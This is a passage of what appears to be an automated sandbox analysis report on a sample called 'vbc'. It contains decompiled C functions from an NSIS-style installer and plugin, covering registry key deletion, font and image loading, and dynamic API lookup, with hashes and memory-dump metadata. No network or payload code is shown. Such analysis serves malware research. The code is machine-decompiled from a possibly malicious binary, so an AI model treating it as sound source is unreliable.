                                                				}
                                                				_t69 = _t68 - 1;
                                                				if(_t69 == 0) {
                                                					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                					if( *((short*)(_t81 + 2)) != 0x26) {
                                                						_t90 = _t90 & _t77;
                                                						_t87 = _t87 & _v12;
                                                						goto L59;
                                                					}
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) == 0) {
                                                						goto L56;
                                                					}
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) == 0) {
                                                						goto L56;
                                                					}
                                                					goto L49;
                                                				}
                                                				_t70 = _t69 - 4;
                                                				if(_t70 == 0) {
                                                					_t48 = E73282EA0(_t90, _t87, _t77, _v12);
                                                					goto L58;
                                                				} else {
                                                					_t71 = _t70 - 1;
                                                					if(_t71 == 0) {
                                                						_t90 = _t90 + _t77;
                                                						asm("adc edi, [ebp-0x8]");
                                                					} else {
                                                						if(_t71 == 0) {
                                                							_t90 = _t90 - _t77;
                                                							asm("sbb edi, [ebp-0x8]");
                                                						}
                                                					}
                                                					goto L59;
                                                				}
                                                			}





























                                                0x73281979
                                                0x73281983
                                                0x7328198c
                                                0x7328198f
                                                0x73281994
                                                0x7328199d
                                                0x732819a6
                                                0x732819a8
                                                0x732819af
                                                0x732819b1
                                                0x732819b4
                                                0x732819bb
                                                0x732819c9
                                                0x732819d2
                                                0x732819d7
                                                0x732819da
                                                0x732819e0
                                                0x732819e0
                                                0x732819e3
                                                0x732819e6
                                                0x732819e9
                                                0x73281ab1
                                                0x73281ab1
                                                0x73281ab4
                                                0x73281b34
                                                0x73281b39
                                                0x73281b48
                                                0x73281b4b
                                                0x73281b53
                                                0x73281b53
                                                0x73281b53
                                                0x73281b55
                                                0x73281b55
                                                0x73281b56
                                                0x73281b56
                                                0x73281b58
                                                0x73281b5a
                                                0x73281b60
                                                0x73281b69
                                                0x73281b7a
                                                0x73281b85
                                                0x73281b85
                                                0x73281b4d
                                                0x73281b2f
                                                0x73281b2f
                                                0x73281b31
                                                0x73281b31
                                                0x00000000
                                                0x73281b31
                                                0x73281b4f
                                                0x73281b51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b51
                                                0x73281b3d
                                                0x73281b41
                                                0x00000000
                                                0x73281b41
                                                0x73281ab6
                                                0x73281ab6
                                                0x73281ab7
                                                0x73281b26
                                                0x73281b28
                                                0x00000000
                                                0x00000000
                                                0x73281b2a
                                                0x73281b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b2d
                                                0x73281ab9
                                                0x73281ab9
                                                0x73281aba
                                                0x73281af7
                                                0x73281afc
                                                0x73281b19
                                                0x73281b1c
                                                0x00000000
                                                0x00000000
                                                0x73281b1e
                                                0x00000000
                                                0x00000000
                                                0x73281b20
                                                0x73281b22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281b24
                                                0x73281afe
                                                0x73281b03
                                                0x73281b05
                                                0x73281b07
                                                0x73281b09
                                                0x73281b12
                                                0x73281b0b
                                                0x73281b0b
                                                0x73281b0b
                                                0x00000000
                                                0x73281b09
                                                0x73281abc
                                                0x73281abc
                                                0x73281abf
                                                0x73281af0
                                                0x73281af2
                                                0x00000000
                                                0x73281af2
                                                0x73281ac1
                                                0x73281ac1
                                                0x73281ac4
                                                0x73281ad7
                                                0x73281adc
                                                0x73281ae9
                                                0x73281aeb
                                                0x00000000
                                                0x73281aeb
                                                0x73281ade
                                                0x73281ae0
                                                0x00000000
                                                0x00000000
                                                0x73281ae2
                                                0x73281ae5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281ae7
                                                0x73281ac7
                                                0x73281ac8
                                                0x73281ace
                                                0x73281ad0
                                                0x73281ad0
                                                0x00000000
                                                0x73281ac8
                                                0x732819ef
                                                0x73281a68
                                                0x73281a6a
                                                0x73281a6d
                                                0x73281a8b
                                                0x73281a8e
                                                0x73281a94
                                                0x73281a99
                                                0x73281a6f
                                                0x73281a6f
                                                0x73281a73
                                                0x73281a77
                                                0x73281a79
                                                0x73281a79
                                                0x73281a9c
                                                0x73281aa0
                                                0x00000000
                                                0x73281aa6
                                                0x73281aa6
                                                0x73281aa9
                                                0x00000000
                                                0x73281aa9
                                                0x73281aa0
                                                0x732819f1
                                                0x732819f4
                                                0x73281a59
                                                0x73281a5b
                                                0x73281a5d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281a63
                                                0x732819f6
                                                0x732819f9
                                                0x00000000
                                                0x00000000
                                                0x732819fb
                                                0x732819fc
                                                0x73281a32
                                                0x73281a37
                                                0x73281a4f
                                                0x73281a51
                                                0x00000000
                                                0x73281a51
                                                0x73281a39
                                                0x73281a3b
                                                0x00000000
                                                0x00000000
                                                0x73281a41
                                                0x73281a44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281a4a
                                                0x732819fe
                                                0x73281a01
                                                0x73281a28
                                                0x00000000
                                                0x73281a03
                                                0x73281a03
                                                0x73281a04
                                                0x73281a18
                                                0x73281a1a
                                                0x73281a06
                                                0x73281a08
                                                0x73281a0e
                                                0x73281a10
                                                0x73281a10
                                                0x73281a08
                                                0x00000000
                                                0x73281a04

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
                                                • Instruction ID: 2f3065ae273deb59b454a12a6298ab46455d55243d5b5f681912ee59548531d7
                                                • Opcode Fuzzy Hash: fac573545b5c4f5aa7fa181a102ba05209c8c2bdeb0ae0f1edf0b1a540345066
                                                • Instruction Fuzzy Hash: BA51E732F1021AABDB069FACC4447DEBBBAEB44310F18815AD406B32D4F6B5B9C5C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E73282480(void* __edx) {
                                                				void* _t37;
                                                				signed int _t38;
                                                				void* _t39;
                                                				void* _t41;
                                                				signed char* _t42;
                                                				signed char* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[0x18];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t41 = 0x1a;
                                                					if(_t52 == _t41) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E7328135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E732812E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M732825F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E732813B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E732813B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x7328506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7328506c, __eax,  *0x7328506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E732812CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E732813B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x7328506c =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
                                                									 *__ebx =  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E73281510(__edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2 + 0x18, __edx,  *0x73285074 + ( *(__esi + 0x18) - 1) *  *0x7328506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E732812CC(0x73285044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x73282494
                                                0x73282498
                                                0x732824a3
                                                0x732824a3
                                                0x732824aa
                                                0x732824af
                                                0x00000000
                                                0x00000000
                                                0x732824b3
                                                0x732824b6
                                                0x00000000
                                                0x00000000
                                                0x732824bb
                                                0x732824c6
                                                0x732824d6
                                                0x00000000
                                                0x732824cd
                                                0x732824cf
                                                0x732824e5
                                                0x00000000
                                                0x732824e5
                                                0x732824bd
                                                0x732824bd
                                                0x732824e6
                                                0x732824e6
                                                0x732824e8
                                                0x732824ec
                                                0x732824ec
                                                0x732824ef
                                                0x732824ef
                                                0x732824f7
                                                0x732824ff
                                                0x73282502
                                                0x732825c1
                                                0x732825c2
                                                0x732825cd
                                                0x732825f7
                                                0x732825f7
                                                0x732825dd
                                                0x732825e9
                                                0x732825df
                                                0x732825df
                                                0x732825df
                                                0x00000000
                                                0x73282508
                                                0x73282508
                                                0x00000000
                                                0x7328250f
                                                0x00000000
                                                0x00000000
                                                0x73282517
                                                0x00000000
                                                0x00000000
                                                0x73282525
                                                0x73282527
                                                0x00000000
                                                0x00000000
                                                0x73282548
                                                0x7328254e
                                                0x73282551
                                                0x73282553
                                                0x73282563
                                                0x00000000
                                                0x00000000
                                                0x73282530
                                                0x73282535
                                                0x73282538
                                                0x73282539
                                                0x00000000
                                                0x00000000
                                                0x7328256f
                                                0x73282575
                                                0x73282576
                                                0x73282579
                                                0x7328257a
                                                0x7328257c
                                                0x00000000
                                                0x00000000
                                                0x73282588
                                                0x7328258b
                                                0x73282597
                                                0x73282599
                                                0x00000000
                                                0x00000000
                                                0x732825a5
                                                0x732825b1
                                                0x732825b4
                                                0x732825b6
                                                0x732825b9
                                                0x00000000
                                                0x00000000
                                                0x73282508
                                                0x73282502
                                                0x732824db
                                                0x732824e0
                                                0x00000000
                                                0x732824e0

                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 732825C2
                                                  • Part of subcall function 732812CC: lstrcpynW.KERNEL32(00000000,?,7328137F,00000019,732811CA,-000000A0), ref: 732812DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 73282548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73282563
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
                                                • Instruction ID: 35ab77e44c613133930b6aceebc56fc9d5167dad3f7b76c25f2f07bda146a88a
                                                • Opcode Fuzzy Hash: be19d93953eb7dd818449451899f3c558546e6638895d4c0731c97430093dc97
                                                • Instruction Fuzzy Hash: 0D419CB110931ADFE719EF259844BE677F8FB48310F20891DE84A865C1E778A5C4DB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E0040690A(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                • GetClientRect.USER32 ref: 00401DE5
                                                • LoadImageW.USER32 ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40ce00 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40ce07 = 1;
                                                				 *0x40ce04 = _t15 & 0x00000001;
                                                				 *0x40ce05 = _t15 & 0x00000002;
                                                				 *0x40ce06 = _t15 & 0x00000004;
                                                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdf0);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E00406484();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32 ref: 00401E73
                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nspDD94.tmp\System.dll,00000000), ref: 00406779
                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E732816BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x732816d7
                                                0x732816e3
                                                0x732816f0
                                                0x732816f7
                                                0x73281700
                                                0x7328170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732822D8,?,00000808), ref: 732816D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732822D8,?,00000808), ref: 732816DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732822D8,?,00000808), ref: 732816F0
                                                • GetProcAddress.KERNEL32(732822D8,00000000,?,00000000,732822D8,?,00000808), ref: 732816F7
                                                • GlobalFree.KERNEL32(00000000), ref: 73281700
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
                                                • Instruction ID: 87f744e47864dba006a378ebab0265f89643c481e62591d74499a9f1d0f9563b
                                                • Opcode Fuzzy Hash: b36f37ea9bdec25e6d85313484d1ca601bd530c20be1503a2dbafeab9ada48d4
                                                • Instruction Fuzzy Hash: B9F0AC732061387FD62126A78C4CEEBBE9CDF8B3F5B214215F62C9219086615D01E7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
